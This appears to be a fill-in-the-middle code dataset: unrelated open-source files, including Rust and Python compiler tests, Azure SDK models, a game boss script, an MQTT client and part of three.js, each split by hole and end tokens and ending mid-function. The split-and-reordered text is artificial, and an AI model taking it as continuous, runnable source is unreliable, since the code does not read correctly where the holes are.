// It avoids using u64/i64 because on some targets that is only 4-byte
// aligned (while on most it is 8-byte aligned) and so the resulting<|fim▁hole|>// padding and overall computed sizes can be quite different.
#![feature(start)]
#![allow(dead_code)]
use std::num::NonZeroU32;
pub enum MyOption<T> { None, Some(T) }
impl<T> Default for MyOption<T> {
fn default() -> Self { MyOption::None }
}
pub enum EmbeddedDiscr {
None,
Record { pre: u8, val: NonZeroU32, post: u16 },
}
impl Default for EmbeddedDiscr {
fn default() -> Self { EmbeddedDiscr::None }
}
#[derive(Default)]
pub struct IndirectNonZero {
pre: u8,
nested: NestedNonZero,
post: u16,
}
pub struct NestedNonZero {
pre: u8,
val: NonZeroU32,
post: u16,
}
impl Default for NestedNonZero {
fn default() -> Self {
NestedNonZero { pre: 0, val: NonZeroU32::new(1).unwrap(), post: 0 }
}
}
pub enum Enum4<A, B, C, D> {
One(A),
Two(B),
Three(C),
Four(D)
}
#[start]
fn start(_: isize, _: *const *const u8) -> isize {
let _x: MyOption<NonZeroU32> = Default::default();
let _y: EmbeddedDiscr = Default::default();
let _z: MyOption<IndirectNonZero> = Default::default();
let _a: MyOption<bool> = Default::default();
let _b: MyOption<char> = Default::default();
let _c: MyOption<std::cmp::Ordering> = Default::default();
let _b: MyOption<MyOption<u8>> = Default::default();
let _e: Enum4<(), char, (), ()> = Enum4::One(());
let _f: Enum4<(), (), bool, ()> = Enum4::One(());
let _g: Enum4<(), (), (), MyOption<u8>> = Enum4::One(());
0
}<|fim▁end|> | |
<|file_name|>ConnectionListResult.java<|end_file_name|><|fim▁begin|>// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.automation.models;
import com.azure.core.annotation.Fluent;
import com.azure.core.util.logging.ClientLogger;
import com.azure.resourcemanager.automation.fluent.models.ConnectionInner;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.annotation.JsonProperty;
import java.util.List;
/** The response model for the list connection operation. */
@Fluent
public final class ConnectionListResult {
@JsonIgnore private final ClientLogger logger = new ClientLogger(ConnectionListResult.class);
/*
* Gets or sets a list of connection.
*/
@JsonProperty(value = "value")
private List<ConnectionInner> value;
/*
* Gets or sets the next link.
*/
@JsonProperty(value = "nextLink")
private String nextLink;
/**
* Get the value property: Gets or sets a list of connection.
*
* @return the value value.
*/
public List<ConnectionInner> value() {<|fim▁hole|>
/**
* Set the value property: Gets or sets a list of connection.
*
* @param value the value value to set.
* @return the ConnectionListResult object itself.
*/
public ConnectionListResult withValue(List<ConnectionInner> value) {
this.value = value;
return this;
}
/**
* Get the nextLink property: Gets or sets the next link.
*
* @return the nextLink value.
*/
public String nextLink() {
return this.nextLink;
}
/**
* Set the nextLink property: Gets or sets the next link.
*
* @param nextLink the nextLink value to set.
* @return the ConnectionListResult object itself.
*/
public ConnectionListResult withNextLink(String nextLink) {
this.nextLink = nextLink;
return this;
}
/**
* Validates the instance.
*
* @throws IllegalArgumentException thrown if the instance is not valid.
*/
public void validate() {
if (value() != null) {
value().forEach(e -> e.validate());
}
}
}<|fim▁end|> | return this.value;
} |
<|file_name|>dataSourceListResult.js<|end_file_name|><|fim▁begin|>/*
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for
* license information.
*
* Code generated by Microsoft (R) AutoRest Code Generator.
* Changes may cause incorrect behavior and will be lost if the code is
* regenerated.<|fim▁hole|>/**
* @class
* Initializes a new instance of the DataSourceListResult class.
* @constructor
* The list data source by workspace operation response.
*
* @member {string} [nextLink] The link (url) to the next page of datasources.
*
*/
class DataSourceListResult extends Array {
constructor() {
super();
}
/**
* Defines the metadata of DataSourceListResult
*
* @returns {object} metadata of DataSourceListResult
*
*/
mapper() {
return {
required: false,
serializedName: 'DataSourceListResult',
type: {
name: 'Composite',
className: 'DataSourceListResult',
modelProperties: {
value: {
required: false,
serializedName: '',
type: {
name: 'Sequence',
element: {
required: false,
serializedName: 'DataSourceElementType',
type: {
name: 'Composite',
className: 'DataSource'
}
}
}
},
nextLink: {
required: false,
serializedName: 'nextLink',
type: {
name: 'String'
}
}
}
}
};
}
}
module.exports = DataSourceListResult;<|fim▁end|> | */
'use strict';
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>__doc__ = """Random number array generators for numarray.
This package was ported to numarray from Numeric's RandomArray and
provides functions to generate numarray of random numbers.
"""<|fim▁hole|>
from RandomArray2 import *<|fim▁end|> | |
<|file_name|>test_compile.py<|end_file_name|><|fim▁begin|>from test_support import verbose, TestFailed
if verbose:
print "Testing whether compiler catches assignment to __debug__"
try:
compile('__debug__ = 1', '?', 'single')
except SyntaxError:
pass
import __builtin__
prev = __builtin__.__debug__
setattr(__builtin__, '__debug__', 'sure')
setattr(__builtin__, '__debug__', prev)
if verbose:
print 'Running tests on argument handling'
try:
exec 'def f(a, a): pass'
raise TestFailed, "duplicate arguments"
except SyntaxError:
pass
try:
exec 'def f(a = 0, a = 1): pass'
raise TestFailed, "duplicate keyword arguments"
except SyntaxError:
pass
try:
exec 'def f(a): global a; a = 1'
raise TestFailed, "variable is global and local"
except SyntaxError:
pass
if verbose:
print "testing complex args"
def comp_args((a, b)):
print a,b
comp_args((1, 2))
def comp_args((a, b)=(3, 4)):
print a, b
comp_args((1, 2))
comp_args()
def comp_args(a, (b, c)):
print a, b, c
comp_args(1, (2, 3))
def comp_args(a=2, (b, c)=(3, 4)):
print a, b, c
comp_args(1, (2, 3))
comp_args()
try:
exec 'def f(a=1, (b, c)): pass'
raise TestFailed, "non-default args after default"
except SyntaxError:
pass
if verbose:
print "testing bad float literals"
def expect_error(s):
try:
eval(s)
raise TestFailed("%r accepted" % s)
except SyntaxError:
pass
expect_error("2e")
expect_error("2.0e+")
expect_error("1e-")
expect_error("3-4e/21")
if verbose:
print "testing literals with leading zeroes"
def expect_same(test_source, expected):
got = eval(test_source)
<|fim▁hole|> (test_source, got, expected))
expect_error("077787")
expect_error("0xj")
expect_error("0x.")
expect_error("0e")
expect_same("0777", 511)
expect_same("0777L", 511)
expect_same("000777", 511)
expect_same("0xff", 255)
expect_same("0xffL", 255)
expect_same("0XfF", 255)
expect_same("0777.", 777)
expect_same("0777.0", 777)
expect_same("000000000000000000000000000000000000000000000000000777e0", 777)
expect_same("0777e1", 7770)
expect_same("0e0", 0)
expect_same("0000E-012", 0)
expect_same("09.5", 9.5)
expect_same("0777j", 777j)
expect_same("00j", 0j)
expect_same("00.0", 0)
expect_same("0e3", 0)
expect_same("090000000000000.", 90000000000000.)
expect_same("090000000000000.0000000000000000000000", 90000000000000.)
expect_same("090000000000000e0", 90000000000000.)
expect_same("090000000000000e-0", 90000000000000.)
expect_same("090000000000000j", 90000000000000j)
expect_error("090000000000000") # plain octal literal w/ decimal digit
expect_error("080000000000000") # plain octal literal w/ decimal digit
expect_error("000000000000009") # plain octal literal w/ decimal digit
expect_error("000000000000008") # plain octal literal w/ decimal digit
expect_same("000000000000007", 7)
expect_same("000000000000008.", 8.)
expect_same("000000000000009.", 9.)
# Verify treatment of unary minus on negative numbers SF bug #660455
expect_same("0xffffffff", -1)
expect_same("-0xffffffff", 1)<|fim▁end|> | if got != expected:
raise TestFailed("eval(%r) gave %r, but expected %r" %
|
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify<|fim▁hole|># it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj<|fim▁end|> | |
<|file_name|>boss_ouro.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2008-2013 TrinityCore <http://www.trinitycore.org/>
* Copyright (C) 2006-2009 ScriptDev2 <https://scriptdev2.svn.sourceforge.net/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/* ScriptData
SDName: Boss_Ouro
SD%Complete: 85
SDComment: No model for submerging. Currently just invisible.
SDCategory: Temple of Ahn'Qiraj
EndScriptData */
#include "ScriptMgr.h"
#include "ScriptedCreature.h"
#include "temple_of_ahnqiraj.h"
enum Spells
{
SPELL_SWEEP = 26103,
SPELL_SANDBLAST = 26102,
SPELL_GROUND_RUPTURE = 26100,
SPELL_BIRTH = 26262, // The Birth Animation
SPELL_DIRTMOUND_PASSIVE = 26092
};
class boss_ouro : public CreatureScript
{
public:
boss_ouro() : CreatureScript("boss_ouro") { }
CreatureAI* GetAI(Creature* creature) const
{
return new boss_ouroAI (creature);
}
struct boss_ouroAI : public ScriptedAI
{
boss_ouroAI(Creature* creature) : ScriptedAI(creature) {}
uint32 Sweep_Timer;
uint32 SandBlast_Timer;
uint32 Submerge_Timer;
uint32 Back_Timer;
uint32 ChangeTarget_Timer;
uint32 Spawn_Timer;
bool Enrage;
bool Submerged;
void Reset()
{
Sweep_Timer = urand(5000, 10000);
SandBlast_Timer = urand(20000, 35000);
Submerge_Timer = urand(90000, 150000);
Back_Timer = urand(30000, 45000);
ChangeTarget_Timer = urand(5000, 8000);
Spawn_Timer = urand(10000, 20000);
<|fim▁hole|> }
void EnterCombat(Unit* /*who*/)
{
DoCast(me->GetVictim(), SPELL_BIRTH);
}
void UpdateAI(uint32 diff)
{
//Return since we have no target
if (!UpdateVictim())
return;
//Sweep_Timer
if (!Submerged && Sweep_Timer <= diff)
{
DoCast(me->GetVictim(), SPELL_SWEEP);
Sweep_Timer = urand(15000, 30000);
} else Sweep_Timer -= diff;
//SandBlast_Timer
if (!Submerged && SandBlast_Timer <= diff)
{
DoCast(me->GetVictim(), SPELL_SANDBLAST);
SandBlast_Timer = urand(20000, 35000);
} else SandBlast_Timer -= diff;
//Submerge_Timer
if (!Submerged && Submerge_Timer <= diff)
{
//Cast
me->HandleEmoteCommand(EMOTE_ONESHOT_SUBMERGE);
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
me->setFaction(35);
DoCast(me, SPELL_DIRTMOUND_PASSIVE);
Submerged = true;
Back_Timer = urand(30000, 45000);
} else Submerge_Timer -= diff;
//ChangeTarget_Timer
if (Submerged && ChangeTarget_Timer <= diff)
{
Unit* target = NULL;
target = SelectTarget(SELECT_TARGET_RANDOM, 0);
if (target)
DoTeleportTo(target->GetPositionX(), target->GetPositionY(), target->GetPositionZ());
ChangeTarget_Timer = urand(10000, 20000);
} else ChangeTarget_Timer -= diff;
//Back_Timer
if (Submerged && Back_Timer <= diff)
{
me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
me->setFaction(14);
DoCast(me->GetVictim(), SPELL_GROUND_RUPTURE);
Submerged = false;
Submerge_Timer = urand(60000, 120000);
} else Back_Timer -= diff;
DoMeleeAttackIfReady();
}
};
};
void AddSC_boss_ouro()
{
new boss_ouro();
}<|fim▁end|> | Enrage = false;
Submerged = false; |
<|file_name|>MoleculeTypeAndSourceQualifierCheckTest.java<|end_file_name|><|fim▁begin|>/*******************************************************************************
* Copyright 2012 EMBL-EBI, Hinxton outstation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
******************************************************************************/
package uk.ac.ebi.embl.api.validation.check.sourcefeature;
import static org.junit.Assert.*;
import java.util.Collection;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import uk.ac.ebi.embl.api.entry.Entry;
import uk.ac.ebi.embl.api.entry.EntryFactory;
import uk.ac.ebi.embl.api.entry.feature.Feature;
import uk.ac.ebi.embl.api.entry.feature.FeatureFactory;
import uk.ac.ebi.embl.api.entry.qualifier.Qualifier;
import uk.ac.ebi.embl.api.entry.sequence.Sequence;
import uk.ac.ebi.embl.api.entry.sequence.SequenceFactory;
import uk.ac.ebi.embl.api.storage.DataRow;
import uk.ac.ebi.embl.api.validation.*;
public class MoleculeTypeAndSourceQualifierCheckTest {
private Entry entry;
private Feature source;
private MoleculeTypeAndSourceQualifierCheck check;
@Before
public void setUp() {
ValidationMessageManager
.addBundle(ValidationMessageManager.STANDARD_VALIDATION_BUNDLE);
EntryFactory entryFactory = new EntryFactory();
SequenceFactory sequenceFactory = new SequenceFactory();
FeatureFactory featureFactory = new FeatureFactory();
entry = entryFactory.createEntry();
source = featureFactory.createSourceFeature();
entry.addFeature(source);
Sequence sequence = sequenceFactory.createSequence();
entry.setSequence(sequence);
DataRow dataRow = new DataRow(
"tissue_type,dev_stage,isolation_source,collection_date,host,lab_host,sex,mating_type,haplotype,cultivar,ecotype,variety,breed,isolate,strain,clone,country,lat_lon,specimen_voucher,culture_collection,biomaterial,PCR_primers",
"mRNA");
GlobalDataSets.addTestDataSet(GlobalDataSetFile.MOLTYPE_SOURCE_QUALIFIERS, dataRow);
DataRow dataRow1=new DataRow("genomic DNA",Qualifier.GERMLINE_QUALIFIER_NAME);
GlobalDataSets.addTestDataSet(GlobalDataSetFile.SOURCE_QUALIFIERS_MOLTYPE_VALUES, dataRow1);
check = new MoleculeTypeAndSourceQualifierCheck();
}
@After
public void tearDown() {
GlobalDataSets.resetTestDataSets();
}
@Test
public void testCheck_NoEntry() {
assertTrue(check.check(null).isValid());
}
@Test
public void testCheck_NoMoleculeType() {
entry.getSequence().setMoleculeType(null);
source.addQualifier("organism", "Deltavirus");
assertTrue(check.check(entry).isValid());
}
@Test
public void testCheck_NoSequence() {
entry.setSequence(null);
source.addQualifier("organism", "liver");
assertTrue(check.check(entry).isValid());
}
@Test
public void testCheck_noSourceQualifier() {
entry.getSequence().setMoleculeType("mRNA");
ValidationResult result = check.check(entry);
assertEquals(2, result.count("MoleculeTypeAndSourceQualifierCheck",
Severity.ERROR));
}
@Test
public void testCheck_NoSource() {
entry.getSequence().setMoleculeType("mRNA");
entry.removeFeature(source);
ValidationResult result = check.check(entry);
assertEquals(0, result.getMessages().size());
}
@Test
public void testCheck_noRequiredQualifier() {
entry.getSequence().setMoleculeType("mRNA");
source.addQualifier("organism", "some organism");
ValidationResult result = check.check(entry);
assertEquals(1, result.getMessages().size());
}
@Test
public void testCheck_requiredQualifier() {
entry.getSequence().setMoleculeType("mRNA");
source.addQualifier("tissue_type", "liver");
ValidationResult result = check.check(entry);
assertEquals(0, result.getMessages().size());
}
@Test
public void testCheck_Message() {
entry.getSequence().setMoleculeType("mRNA");
ValidationResult result = check.check(entry);
Collection<ValidationMessage<Origin>> messages = result.getMessages(
"MoleculeTypeAndSourceQualifierCheck", Severity.ERROR);
assertEquals(
"At least one of the Qualifiers \"tissue_type, dev_stage, isolation_source, collection_date, host, lab_host, sex, mating_type, haplotype, cultivar, ecotype, variety, breed, isolate, strain, clone, country, lat_lon, specimen_voucher, culture_collection, biomaterial, PCR_primers\" must exist in Source feature if Molecule Type matches the Value \"mRNA\".",
messages.iterator().next().getMessage());
}
@Test
public void testCheck_invalidMolTypeValue() {
entry.getSequence().setMoleculeType("mRNA");
source.addQualifier(Qualifier.GERMLINE_QUALIFIER_NAME);
entry.addFeature(source);
ValidationResult result = check.check(entry);
assertEquals(1,result.getMessages("MoleculeTypeAndSourceQualifierCheck_1", Severity.ERROR).size());<|fim▁hole|> }
@Test
public void testCheck_validMolTypeValue() {
entry.getSequence().setMoleculeType("genomic DNA");
source.addQualifier(Qualifier.GERMLINE_QUALIFIER_NAME);
entry.addFeature(source);
ValidationResult result = check.check(entry);
assertEquals(0,result.getMessages("MoleculeTypeAndSourceQualifierCheck_1", Severity.ERROR).size());
}
}<|fim▁end|> | |
<|file_name|>concatReads.py<|end_file_name|><|fim▁begin|>"""
Author: Junhong Chen
"""
from Bio import SeqIO
import gzip
import sys
import os
pe1 = []
pe2 = []
pname = []
for dirName, subdirList, fileList in os.walk(sys.argv[1]):
for fname in fileList:
tmp = fname.split(".")[0]
tmp = tmp[:len(tmp)-1]
if tmp not in pname:
pname.append(tmp)
pe1.append(dirName+"/"+tmp+"1.fq.gz")
pe2.append(dirName+"/"+tmp+"2.fq.gz")
def concat(name,file_list):
with open(name, 'w') as w_file:
for filen in file_list:
print 'working with',filen
with gzip.open(filen, 'rU') as o_file:
seq_records = SeqIO.parse(o_file, 'fastq')
SeqIO.write(seq_records, w_file, 'fastq')
<|fim▁hole|>#print pe1
#print pe2
concat(sys.argv[2]+"-pe1.fq", pe1)
concat(sys.argv[2]+"-pe2.fq", pe2)<|fim▁end|> | |
<|file_name|>issue-43927-non-ADT-derive.rs<|end_file_name|><|fim▁begin|>// Copyright 2017 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
<|fim▁hole|>#![derive(Debug, PartialEq, Eq)] // should be an outer attribute!
//~^ ERROR `derive` may only be applied to structs, enums and unions
struct DerivedOn;
fn main() {}<|fim▁end|> | #![allow(dead_code)]
|
<|file_name|>test_parallel_executor_seresnext_with_reduce_cpu.py<|end_file_name|><|fim▁begin|># Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
from parallel_executor_test_base import TestParallelExecutorBase, DeviceType
import seresnext_net
import paddle.fluid.core as core
class TestResnetWithReduceBase(TestParallelExecutorBase):
def _compare_reduce_and_allreduce(self, use_device, delta2=1e-5):
if use_device == DeviceType.CUDA and not core.is_compiled_with_cuda():
return
all_reduce_first_loss, all_reduce_last_loss = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),
iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=False,
optimizer=seresnext_net.optimizer)
reduce_first_loss, reduce_last_loss = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),
iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=True,
optimizer=seresnext_net.optimizer)
for loss in zip(all_reduce_first_loss, reduce_first_loss):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(all_reduce_last_loss, reduce_last_loss):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
if not use_device:
return
all_reduce_first_loss_seq, all_reduce_last_loss_seq = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),
iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=False,
optimizer=seresnext_net.optimizer,
enable_sequential_execution=True)
reduce_first_loss_seq, reduce_last_loss_seq = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),<|fim▁hole|> optimizer=seresnext_net.optimizer,
enable_sequential_execution=True)
for loss in zip(all_reduce_first_loss, all_reduce_first_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(all_reduce_last_loss, all_reduce_last_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
for loss in zip(reduce_first_loss, reduce_first_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(reduce_last_loss, reduce_last_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
for loss in zip(all_reduce_first_loss_seq, reduce_first_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(all_reduce_last_loss_seq, reduce_last_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
class TestResnetWithReduceCPU(TestResnetWithReduceBase):
def test_seresnext_with_reduce(self):
self._compare_reduce_and_allreduce(
use_device=DeviceType.CPU, delta2=1e-3)
if __name__ == '__main__':
unittest.main()<|fim▁end|> | iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=True, |
<|file_name|>SWIGOUTDIR.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that use of the $SWIGOUTDIR variable causes SCons to recognize
that Java files are created in the specified output directory.
"""
import TestSCons
test = TestSCons.TestSCons()
swig = test.where_is('swig')
if not swig:
test.skip_test('Can not find installed "swig", skipping test.\n')
where_java_include=test.java_where_includes()
if not where_java_include:
test.skip_test('Can not find installed Java include files, skipping test.\n')
test.write(['SConstruct'], """\
env = Environment(tools = ['default', 'swig'],
CPPPATH=%(where_java_include)s,
)
Java_foo_interface = env.SharedLibrary(
'Java_foo_interface',
'Java_foo_interface.i',
SWIGOUTDIR = 'java/build dir',
SWIGFLAGS = '-c++ -java -Wall',
SWIGCXXFILESUFFIX = "_wrap.cpp")
""" % locals())
test.write('Java_foo_interface.i', """\
%module foopack
""")
# SCons should realize that it needs to create the "java/build dir"
# subdirectory to hold the generated .java files.
test.run(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')
# SCons should remove the built .java files.
test.run(arguments = '-c')
test.must_not_exist('java/build dir/foopackJNI.java')
test.must_not_exist('java/build dir/foopack.java')
<|fim▁hole|>test.must_exist('java/build dir/foopack.java')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:<|fim▁end|> | # SCons should realize it needs to rebuild the removed .java files.
test.not_up_to_date(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java') |
<|file_name|>core.py<|end_file_name|><|fim▁begin|>import os
from angular_flask import app
from flask.ext.restless import APIManager
from flask.ext.mongoengine import MongoEngine
app.config["MONGODB_SETTINGS"] = {'DB':os.environ.get('MONGODB_DB'),"host":os.environ.get('MONGODB_URI')}
mongo_db = MongoEngine(app)<|fim▁hole|><|fim▁end|> |
api_manager = APIManager(app) |
<|file_name|>mqtt.cpp<|end_file_name|><|fim▁begin|>#include <ESP8266WiFi.h>
#include <PubSubClient.h>
#include "mqtt.h"
// Connect to MQTT and set up subscriptions based on configuration
void MQTT::connect() {
// Connect to broker
this->mqttClient.setServer(this->host, this->port);
mqttClient.connect(this->clientId);
Serial.print("Connected to MQTT, with server: ");
Serial.print(this->host);
Serial.print(", port: ");
Serial.print(this->port);
Serial.print(", with client ID: ");
Serial.println(this->clientId);
// Send ping
ping();
}
// Send ping to MQTT broker
void MQTT::ping() {
<|fim▁hole|> sprintf(payload, "%s ok", this->clientId);
this->mqttClient.publish("/status", payload);
Serial.println("Sent ping to broker");
}<|fim▁end|> | char payload[50];
|
<|file_name|>Object3D.js<|end_file_name|><|fim▁begin|>import { Quaternion } from '../math/Quaternion';
import { Vector3 } from '../math/Vector3';
import { Matrix4 } from '../math/Matrix4';
import { EventDispatcher } from './EventDispatcher';
import { Euler } from '../math/Euler';
import { Layers } from './Layers';
import { Matrix3 } from '../math/Matrix3';
import { _Math } from '../math/Math';
/**
* @author mrdoob / http://mrdoob.com/
* @author mikael emtinger / http://gomo.se/
* @author alteredq / http://alteredqualia.com/
* @author WestLangley / http://github.com/WestLangley
* @author elephantatwork / www.elephantatwork.ch
*/
var object3DId = 0;
function Object3D() {
Object.defineProperty( this, 'id', { value: object3DId ++ } );
this.uuid = _Math.generateUUID();
this.name = '';
this.type = 'Object3D';
this.parent = null;
this.children = [];
this.up = Object3D.DefaultUp.clone();
var position = new Vector3();
var rotation = new Euler();
var quaternion = new Quaternion();
var scale = new Vector3( 1, 1, 1 );
function onRotationChange() {
quaternion.setFromEuler( rotation, false );
}
function onQuaternionChange() {
rotation.setFromQuaternion( quaternion, undefined, false );
}
rotation.onChange( onRotationChange );
quaternion.onChange( onQuaternionChange );
Object.defineProperties( this, {
position: {
enumerable: true,
value: position
},
rotation: {
enumerable: true,
value: rotation
},
quaternion: {
enumerable: true,
value: quaternion
},
scale: {
enumerable: true,
value: scale
},
modelViewMatrix: {
value: new Matrix4()
},
normalMatrix: {
value: new Matrix3()
}
} );
this.matrix = new Matrix4();
this.matrixWorld = new Matrix4();
this.matrixAutoUpdate = Object3D.DefaultMatrixAutoUpdate;
this.matrixWorldNeedsUpdate = false;
this.layers = new Layers();
this.visible = true;
this.castShadow = false;
this.receiveShadow = false;
this.frustumCulled = true;
this.renderOrder = 0;
this.userData = {};
}
Object3D.DefaultUp = new Vector3( 0, 1, 0 );
Object3D.DefaultMatrixAutoUpdate = true;
Object.assign( Object3D.prototype, EventDispatcher.prototype, {
isObject3D: true,
onBeforeRender: function () {},
onAfterRender: function () {},
applyMatrix: function ( matrix ) {
this.matrix.multiplyMatrices( matrix, this.matrix );
this.matrix.decompose( this.position, this.quaternion, this.scale );
},
applyQuaternion: function ( q ) {
this.quaternion.premultiply( q );
return this;
},
setRotationFromAxisAngle: function ( axis, angle ) {
// assumes axis is normalized
this.quaternion.setFromAxisAngle( axis, angle );
},
setRotationFromEuler: function ( euler ) {
this.quaternion.setFromEuler( euler, true );
},
setRotationFromMatrix: function ( m ) {
// assumes the upper 3x3 of m is a pure rotation matrix (i.e, unscaled)
this.quaternion.setFromRotationMatrix( m );
},
setRotationFromQuaternion: function ( q ) {
// assumes q is normalized
this.quaternion.copy( q );
},
rotateOnAxis: function () {
// rotate object on axis in object space
// axis is assumed to be normalized
var q1 = new Quaternion();
return function rotateOnAxis( axis, angle ) {
q1.setFromAxisAngle( axis, angle );
this.quaternion.multiply( q1 );
return this;
};
}(),
rotateX: function () {
var v1 = new Vector3( 1, 0, 0 );
return function rotateX( angle ) {
return this.rotateOnAxis( v1, angle );
};
}(),
rotateY: function () {
var v1 = new Vector3( 0, 1, 0 );
return function rotateY( angle ) {
return this.rotateOnAxis( v1, angle );
};
}(),
rotateZ: function () {
var v1 = new Vector3( 0, 0, 1 );
return function rotateZ( angle ) {
